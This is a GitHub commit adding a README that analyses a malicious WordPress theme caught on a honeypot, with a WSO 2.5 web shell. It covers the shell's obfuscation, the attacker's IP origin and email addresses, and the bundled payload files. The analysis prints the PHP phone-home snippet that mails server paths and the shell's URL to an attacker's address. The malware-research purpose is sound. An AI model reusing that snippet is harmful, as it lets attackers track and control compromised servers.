Skip to content

Commit

Permalink
Rename
Browse files Browse the repository at this point in the history
  • Loading branch information
@bediger4000
bediger4000 committed Jul 10, 2018
1 parent e3e6203 commit 581e15f
Showing 1 changed file with 96 additions and 0 deletions.
96 changes: 96 additions & 0 deletions activex/README.md
View file
@@ -0,0 +1,96 @@
# Kinked theme named activex

A theme with a WSO 2.5 web shell, which itself has a phone-home,
and a

The `webrot.php` file also appears on [pastebin](https://pastebin.com/Md5U41ME),
dated Dec 30, 2013.
Five years floating around.

## Origin

### IP Address 195.142.179.223

IP address 195.142.179.223 has DNS name of host-195-142-179-223.reverse.superonline.net.

host-195-142-179-223.reverse.superonline.net does not have an A record

`geoiplookup` says: GeoIP Country Edition: TR, Turkey

% Information related to '195.142.179.0/24AS34984'
route: 195.142.179.0/24
descr: SOL-BNG
origin: AS34984
mnt-by: MNT-TELLCOM
mnt-routes: MNT-TELLCOM
created: 2014-04-14T13:30:03Z
last-modified: 2014-04-14T13:30:03Z
source: RIPE

MNT-TELLCOM is apparently an ISP in Istanbul.

The last IP address to respond on a traceroute to 195.142.179.223 is 46.33.86.46,
apparently located in Germany.

### Download

Downloaded to a WordPress honey pot as a theme upload.
The attacker(s) sent a zip-format file, which apparently has a
real WordPress theme in it,

All the files have a date of Aug 1, 2013,
except for `webrot.php`
and `images.php`

## Deofbuscation

`images.php` was merely base64-encoded, only one layer of
obfuscation.

`webrot.php` had a more intricate obfuscation,
which it shares with other malware I've caught.
See [A common encoding](../common_encoding) for details.

## Analysis

`images.php` is a Web Shell by oRb (WSO) version 2.5,
complete with a phone-home:

$me=base64_decode("ZmVyaWQyM0BnbWFpbC5jb20=");
$thm="Server";
$fuck="Dosya Yolu : ".$_SERVER['DOCUMENT_ROOT']."\r\n";
$fuck.="Server Admin : ".$_SERVER['SERVER_ADMIN']."\r\n";
$fuck.="Server isletim sistemi : ".$_SERVER['SERVER_SOFTWARE']."\r\n";
$fuck.="Shell Link : http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."\r\n";
$fuck.="Avlanan Site : " .$_SERVER['HTTP_HOST']."\r\n";
mail($me, $thm, $fuck);

`$me` ends up containing the email address "ferid23@gmail.com".
I see this email address associated with a 2014 [Russian account](https://notessysadmin.com/kak-ayyildiz-team-slomali-moj-blog) of
Turkish hackers Ayyildiz Tim "breaking" a blog.
That reconciles with the Turkish ISP or telecom for the IP address this
attack came from.

At least this is a new phone-home, not just a decoded "wsobuff" from WSO 2.5.1
with a different "to" address. Props to ferid23@gmail.com for that effort.

`webrot.php` is slightly more interesting.

It phones home to mymktmymkt@gmail.com and tokmaktokmak1@gmail.com
with the same information that `images.php` sends to ol' ferid23@gmail.com
tokmaktokmak1@gmail.com appears on a [pastebin](https://pastebin.com/Md5U41ME),
on a [Turkish security site](https://www.turkhackteam.org/web-server-guvenligi/1140416-webr00t-shell-decode.html)
and a few others.

`webrot.php` contains a number of base64-encoded pieces of source:

* Perl file `web.root` - a Perl web shell?
* PHP file `cmd.php`
* PHP file `litebypass.php`
* PHP file `mass.php`
* PHP file `wpindex.php` - Frenchish variable names?

Lots of "coded by WebRooT" comments throughout,
but very uneven coding style and naming conventions.
Some output is Turkish, some is English.
Looks like "WebRooT" put this package together from pre-existing code.

0 comments on commit 581e15f

Please sign in to comment.